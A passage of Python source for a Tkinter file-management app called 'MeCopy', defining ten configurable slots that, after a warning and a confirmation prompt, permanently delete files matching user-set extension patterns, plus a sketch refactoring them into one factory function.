bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=228)
Entry_Del_Extensions_3 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_3).place(x=370, y=251)
def Get_Src_Del_4():
Src_Del_Path_Selected_4 = filedialog.askdirectory()
Src_Del_Path_4.set(Src_Del_Path_Selected_4)
Src_Del_Path_4 = tk.StringVar()
Del_Extensions_4 = tk.StringVar()
Path_Name_Del_4 = tk.StringVar()
Src_Del_Path_4.set(parser.get("Paths_Src_2", "path_4"))
Src_Title_Del_4 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=365)
Patch_Del_Entry_4 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_4).place(x=155, y=369)
Button_Search_Path_Del_4 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_4).place(x=282, y=368)
Path_Name_Del_4.set(parser.get("Path_Names_2", "path_name_4"))
Del_Extensions_4.set(parser.get("Extensions_2", "Search_4"))
Entry_Path_Del_4 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_4).place(x=165, y=345)
Ext_Search_Del_4 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=347)
Entry_Del_Extensions_4 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_4).place(x=370, y=369)
def Get_Src_Del_5():
Src_Del_Path_Selected_5 = filedialog.askdirectory()
Src_Del_Path_5.set(Src_Del_Path_Selected_5)
Src_Del_Path_5 = tk.StringVar()
Del_Extensions_5 = tk.StringVar()
Path_Name_Del_5 = tk.StringVar()
Src_Del_Path_5.set(parser.get("Paths_Src_2", "path_5"))
Src_Title_Del_5 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=481)
Patch_Del_Entry_5 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_5).place(x=155, y=485)
Button_Search_Path_Del_5 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_5).place(x=282, y=484)
Path_Name_Del_5.set(parser.get("Path_Names_2", "path_name_5"))
Del_Extensions_5.set(parser.get("Extensions_2", "Search_5"))
Entry_Path_Del_5 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_5).place(x=165, y=462)
Ext_Search_Del_5 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=463)
Entry_Del_Extensions_5 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_5).place(x=370, y=486)
def Get_Src_Del_6():
Src_Del_Path_Selected_6 = filedialog.askdirectory()
Src_Del_Path_6.set(Src_Del_Path_Selected_6)
Src_Del_Path_6 = tk.StringVar()
Del_Extensions_6 = tk.StringVar()
Path_Name_Del_6 = tk.StringVar()
Src_Del_Path_6.set(parser.get("Paths_Src_2", "path_6"))
Src_Title_Del_6 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=19)
Patch_Del_Entry_6 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_6).place(x=746, y=22)
Button_Search_Path_Del_6 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_6).place(x=873, y=21)
Path_Name_Del_6.set(parser.get("Path_Names_2", "path_name_6"))
Del_Extensions_6.set(parser.get("Extensions_2", "Search_6"))
Entry_Path_Del_6 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_6).place(x=755, y=0)
Ext_Search_Del_6 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=0)
Entry_Del_Extensions_6 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_6).place(x=960, y=23)
def Get_Src_Del_7():
Src_Del_Path_Selected_7 = filedialog.askdirectory()
Src_Del_Path_7.set(Src_Del_Path_Selected_7)
Src_Del_Path_7 = tk.StringVar()
Del_Extensions_7 = tk.StringVar()
Path_Name_Del_7 = tk.StringVar()
Src_Del_Path_7.set(parser.get("Paths_Src_2", "path_7"))
Src_Title_Del_7 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=130)
Patch_Del_Entry_7 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_7).place(x=746, y=133)
Button_Search_Path_Del_7 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_7).place(x=873, y=132)
Path_Name_Del_7.set(parser.get("Path_Names_2", "path_name_7"))
Del_Extensions_7.set(parser.get("Extensions_2", "Search_7"))
Entry_Path_Del_7 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_7).place(x=755, y=112)
Ext_Search_Del_7 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=110)
Entry_Del_Extensions_7 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_7).place(x=960, y=134)
def Get_Src_Del_8():
Src_Del_Path_Selected_8 = filedialog.askdirectory()
Src_Del_Path_8.set(Src_Del_Path_Selected_8)
Src_Del_Path_8 = tk.StringVar()
Del_Extensions_8 = tk.StringVar()
Path_Name_Del_8 = tk.StringVar()
Src_Del_Path_8.set(parser.get("Paths_Src_2", "path_8"))
Src_Title_Del_8 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=247)
Patch_Del_Entry_8 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_8).place(x=746, y=250)
Button_Search_Path_Del_8 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_8).place(x=873, y=249)
Path_Name_Del_8.set(parser.get("Path_Names_2", "path_name_8"))
Del_Extensions_8.set(parser.get("Extensions_2", "Search_8"))
Entry_Path_Del_8 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_8).place(x=755, y=225)
Ext_Search_Del_8 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=228)
Entry_Del_Extensions_8 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_8).place(x=960, y=251)
def Get_Src_Del_9():
Src_Del_Path_Selected_9 = filedialog.askdirectory()
Src_Del_Path_9.set(Src_Del_Path_Selected_9)
Src_Del_Path_9 = tk.StringVar()
Del_Extensions_9 = tk.StringVar()
Path_Name_Del_9 = tk.StringVar()
Src_Del_Path_9.set(parser.get("Paths_Src_2", "path_9"))
Src_Title_Del_9 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=365)
Patch_Del_Entry_9 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_9).place(x=746, y=369)
Button_Search_Path_Del_9 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_9).place(x=873, y=368)
Path_Name_Del_9.set(parser.get("Path_Names_2", "path_name_9"))
Del_Extensions_9.set(parser.get("Extensions_2", "Search_9"))
Entry_Path_Del_9 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_9).place(x=755, y=345)
Ext_Search_Del_9 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=347)
Entry_Del_Extensions_9 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_9).place(x=960, y=370)
def Get_Src_Del_10():
Src_Del_Path_Selected_10 = filedialog.askdirectory()
Src_Del_Path_10.set(Src_Del_Path_Selected_10)
Src_Del_Path_10 = tk.StringVar()
Del_Extensions_10 = tk.StringVar()
Path_Name_Del_10 = tk.StringVar()
Src_Del_Path_10.set(parser.get("Paths_Src_2", "path_10"))
Src_Title_Del_10 = tk.Label(Delete_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=481)
Patch_Del_Entry_10 = EntryEx(Delete_Frame, style="EntryStyle.TEntry",
textvariable=Src_Del_Path_10).place(x=746, y=485)
Button_Search_Path_Del_10 = ttk.Button(
Delete_Frame, text="Search", style="flat.TButton", command=Get_Src_Del_10).place(x=873, y=484)
Path_Name_Del_10.set(parser.get("Path_Names_2", "path_name_10"))
Del_Extensions_10.set(parser.get("Extensions_2", "Search_10"))
Entry_Path_Del_10 = EntryEx(Delete_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Path_Name_Del_10).place(x=755, y=462)
Ext_Search_Del_10 = tk.Label(Delete_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=462)
Entry_Del_Extensions_10 = EntryEx(
Delete_Frame, style="EntryStyle.TEntry", textvariable=Del_Extensions_10).place(x=960, y=486)
#DEL_SRC_REQUEST_END
#DEL_MODULES_START
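# Each Delete_Module_N below: (1) saves the slot's current path/extension/name
# back to config.ini, (2) shows a warning plus a yes/no confirmation (files are
# removed permanently, not recycled), then (3) walks the source tree with
# os.walk and os.remove()s every file matching the fnmatch extension pattern,
# showing an indeterminate progress bar while it runs.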
def Delete_Module_1():
try:
parser.set("Paths_Src_2", "path_1", Src_Del_Path.get())
parser.set("Extensions_2", "Search_1", Del_Extensions_1.get())
parser.set("Path_Names_2", "path_name_1", Path_Name_Del_1.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path.get())
Del_Extension_Read = literal_eval(parser.get("Extensions_2", "Search_1"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_1") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_1")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=435, y=67, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=487, y=45)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
progressbar.destroy()
Transfer_InProcress.destroy()
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=340, y=67)
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_1")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_2():
try:
parser.set("Paths_Src_2", "path_2", Src_Del_Path_2.get())
parser.set("Extensions_2", "Search_2", Del_Extensions_2.get())
parser.set("Path_Names_2", "path_name_2", Path_Name_Del_2.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_2.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_2"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_2") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_2")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=435, y=178, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=487, y=157)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=340, y=178)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_2")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_3():
try:
parser.set("Paths_Src_2", "path_3", Src_Del_Path_3.get())
parser.set("Extensions_2", "Search_3", Del_Extensions_3.get())
parser.set("Path_Names_2", "path_name_3", Path_Name_Del_3.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_3.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_3"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_3") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_3")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=435, y=296, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=487, y=275)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
progressbar.destroy()
Transfer_InProcress.destroy()
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=340, y=296)
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_3")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_4():
try:
parser.set("Paths_Src_2", "path_4", Src_Del_Path_4.get())
parser.set("Extensions_2", "Search_4", Del_Extensions_4.get())
parser.set("Path_Names_2", "path_name_4", Path_Name_Del_4.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_4.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_4"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_4") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_4")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=435, y=414, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=487, y=393)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=340, y=414)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_4")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_5():
try:
parser.set("Paths_Src_2", "path_5", Src_Del_Path_5.get())
parser.set("Extensions_2", "Search_5", Del_Extensions_5.get())
parser.set("Path_Names_2", "path_name_5", Path_Name_Del_5.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_5.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_5"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_5") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_5")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=435, y=531, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=487, y=510)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=340, y=531)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_5")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_6():
try:
parser.set("Paths_Src_2", "path_6", Src_Del_Path_6.get())
parser.set("Extensions_2", "Search_6", Del_Extensions_6.get())
parser.set("Path_Names_2", "path_name_6", Path_Name_Del_6.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_6.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_6"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_6") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_6")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1029, y=67, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=1080, y=45)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=950, y=67)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_6")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_7():
try:
parser.set("Paths_Src_2", "path_7", Src_Del_Path_7.get())
parser.set("Extensions_2", "Search_7", Del_Extensions_7.get())
parser.set("Path_Names_2", "path_name_7", Path_Name_Del_7.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_7.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_7"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_7") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_7")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1029, y=178, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=1080, y=157)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=950, y=178)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_7")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_8():
try:
parser.set("Paths_Src_2", "path_8", Src_Del_Path_8.get())
parser.set("Extensions_2", "Search_8", Del_Extensions_8.get())
parser.set("Path_Names_2", "path_name_8", Path_Name_Del_8.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_8.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_8"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_8") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_8")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1029, y=296, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=1080, y=275)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=950, y=296)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_8")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_9():
try:
parser.set("Paths_Src_2", "path_9", Src_Del_Path_9.get())
parser.set("Extensions_2", "Search_9", Del_Extensions_9.get())
parser.set("Path_Names_2", "path_name_9", Path_Name_Del_9.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_9.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_9"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_9") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_9")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1029, y=414, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=1080, y=393)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=950, y=414)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_9")+" is misspelled or do not exist.", title="MeCopy")
pass
def Delete_Module_10():
try:
parser.set("Paths_Src_2", "path_10", Src_Del_Path_10.get())
parser.set("Extensions_2", "Search_10", Del_Extensions_10.get())
parser.set("Path_Names_2", "path_name_10", Path_Name_Del_10.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
Src = win32api.GetShortPathName(Src_Del_Path_10.get())
Del_Extension_Read = literal_eval(
parser.get("Extensions_2", "Search_10"))
messagebox.showwarning(message="ATTENTION: All the specified files will be erased with this option (" + parser.get("Path_Names_2", "path_name_10") +
") and will not be sent to recycle bin. If you select 'yes' in the next tab, there is no turning back.", title="MeCopy")
Alert_Del = tk.messagebox.askyesno(title="MeCopy", message="Are you sure you want to delete "+parser.get(
"Path_Names_2", "path_name_10")+"? There is no turning back after this. ")
if Alert_Del is True:
try:
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=1029, y=531, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Removing...")
Transfer_InProcress.place(x=1080, y=510)
for rootDir, subdirs, filenames in os.walk(Src):
for filename in fnmatch.filter(filenames, Del_Extension_Read):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
pass
except WindowsError:
pass
Deleting_Completed = tk.Label(
Delete_Frame, bg="#dbdbdb", fg="#382d2b", text="Files deleted at " + time.strftime("%H:%M:%S"))
Deleting_Completed.place(x=950, y=531)
progressbar.destroy()
Transfer_InProcress.destroy()
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="Path "+parser.get(
"Path_Names_2", "path_name_10")+" is misspelled or do not exist.", title="MeCopy")
pass
# DEL_MODULES_END
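# A hedged refactor sketch (hypothetical helper, not called anywhere): the ten
# Delete_Module_N bodies above differ only in their config keys, StringVars and
# widget coordinates, so they could be generated from one factory. Assumes the
# same module-level names used above (parser, tk, ttk, win32api, fnmatch,
# literal_eval, pywintypes).
def make_delete_module(slot, path_var, ext_var, name_var, bar_xy):
    def delete_module():
        try:
            # Persist this slot's settings, exactly as the hand-written modules do.
            parser.set("Paths_Src_2", "path_%d" % slot, path_var.get())
            parser.set("Extensions_2", "Search_%d" % slot, ext_var.get())
            parser.set("Path_Names_2", "path_name_%d" % slot, name_var.get())
            with open('config.ini', 'w') as myconfig:
                parser.write(myconfig)
            src = win32api.GetShortPathName(path_var.get())
            pattern = literal_eval(parser.get("Extensions_2", "Search_%d" % slot))
            if not tk.messagebox.askyesno(title="MeCopy",
                                          message="Are you sure you want to delete " + name_var.get() + "?"):
                return
            # Indeterminate bar while the walk runs, as in the modules above.
            bar = ttk.Progressbar(mode="indeterminate")
            bar.place(x=bar_xy[0], y=bar_xy[1], width=100)
            bar.start(10)
            for root_dir, _subdirs, filenames in os.walk(src):
                for filename in fnmatch.filter(filenames, pattern):
                    try:
                        os.remove(os.path.join(root_dir, filename))
                    except OSError:
                        pass
            bar.destroy()
        except (SyntaxError, ValueError, TypeError, FileNotFoundError, pywintypes.error):
            pass
    return delete_module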
# START_DELETE_THREADS
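# Tkinter widgets must only be touched from the main thread, so each delete job
# runs in a worker thread while the UI polls is_alive() once a second via
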